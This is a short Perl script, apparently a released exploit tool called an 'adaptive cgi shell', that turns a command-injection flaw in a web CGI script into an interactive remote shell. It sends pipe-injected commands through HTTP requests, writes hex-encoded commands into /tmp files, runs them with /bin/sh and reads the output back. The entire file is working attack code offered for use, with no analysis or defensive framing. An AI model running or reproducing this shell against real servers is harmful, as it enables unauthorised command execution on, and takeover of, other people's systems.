#!/usr/bin/perl # adaptive cgi shell by secye use LWP::Simple; $part1 = @ARGV[0]; $part2 = @ARGV[1]; print "Making buffer...\n"; for $bet (100..200) { $bettwo = $bettwo . "AAAA" . $bet . "AAAA\\\\n"; } print "Exploiting...\n"; $id = get("$part1\|id\|$part2"); $id =~ m/(uid=\d+\(.*\) gid=\d+\(.*\) groups=\d+\(.*\))/; print "Well shizzle my nizzle... shell by oxagast... use wisely \;\)\n\n"; $uid = $1; print "$uid\n"; while (0 == 0) { print "\$ "; $cmd = <STDIN>; chomp($cmd); if ($cmd =~ m/cd (\/.*)/) { $dir = $1; } if ($cmd eq "cd ..") { $dir =~ s/(.*)\/.*/\/\1/; } if ($cmd eq "pwd") { $dirjunk = $dir; if ($dirjunk eq "//") { $dirjunk = "/"; } } $dirjunk = "cd $dir\;$cmd"; $cmdhex = unpack("H*","$dirjunk &>/tmp/cmdlnerr"); $cmdhex =~ s/(..)/\\\\x$1/g; get("$part1\|echo -e $bettwo > /tmp/buff\|$part2"); $backjunk2 = get("$part1\|cat /tmp/buff\|$part2"); @backjunk = split("\n", $backjunk2); get("$part1\|echo -e \"$cmdhex\" > /tmp/cmdln\|$part2"); get("$part1\|/bin/sh /tmp/cmdln > /tmp/cmdlerr\|$part2"); $backjunk_as = get("$part1\|cat /tmp/cmdlnerr\|$part2"); @backjunk_split = split("\n", $backjunk_as); $backjunk_wcl = get("$part1\|wc -l /tmp/cmdlnerr\|$part2"); $backjunk_wcl =~ m/(\d+) \/tmp\/cmdlnerr/m; $thismanylines = $1 - 1; for $junknum (0..scalar(@backjunk_split)) { for $fuzz (10..100+$thismanylines) { if ($backjunk[$junknum] =~ m/(AAAA\Q$fuzz\EAAAA)/) { $middle = $1; @backjunk[$junknum] =~ m/(.*)\Q$middle\E/; @backjunk_split[$junknum] =~ s/$1//; @backjunk[$junknum] =~ m/\Q$middle\E(.*)/; @backjunk_split[$junknum] =~ s/$1//; print "$backjunk_split[$junknum]\n"; } } } }